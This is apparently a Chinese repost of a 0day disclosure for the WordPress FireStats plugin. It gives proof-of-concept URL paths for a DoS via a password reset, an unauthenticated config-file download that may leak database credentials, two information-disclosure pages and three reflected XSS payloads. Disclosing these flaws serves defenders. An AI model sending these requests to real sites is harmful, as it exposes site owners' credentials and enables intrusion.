firestats插件引起的wordpress安全漏洞
- 发表于
- Vulndb
我试图找出firestats插件的安全漏洞,结果发现了存在7个安全问题:1x DoS:
1x 远程下载配置文件,这可能包含数据库的信息 (用户名,密码,姓名,前缀,主机)
2x Information disclosue:
3x XSS:
希望插件团队尽快修复,因为我们有很多人正在使用这个插件,以前的修复程序很快就会出来所以我相信这次也一样会很快出现!
|
1 |
/wp-content/plugins/firestats/bridge.php?file_id=reset_password&show=1 |
1x 远程下载配置文件,这可能包含数据库的信息 (用户名,密码,姓名,前缀,主机)
|
1 |
/wp-content/plugins/firestats/php/tools/get_config.php |
2x Information disclosue:
|
1 2 |
/wp-content/plugins/firestats/php/page-sites.php /wp-content/plugins/firestats/php/page-tools.php |
3x XSS:
|
1 2 3 |
/wp-content/plugins/firestats/php/window-add-excluded-ip.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E /wp-content/plugins/firestats/php/window-add-excluded-url.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E /wp-content/plugins/firestats/php/window-new-edit-site.php?site_id=%27%20onmousemove=alert%28123%29;%20style=width:900;height:900;%20a= |
希望插件团队尽快修复,因为我们有很多人正在使用这个插件,以前的修复程序很快就会出来所以我相信这次也一样会很快出现!
ps:http://h.ackack.net/more-0day-wordpress-security-leaks-in-firestats.html
原文连接:firestats插件引起的wordpress安全漏洞
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
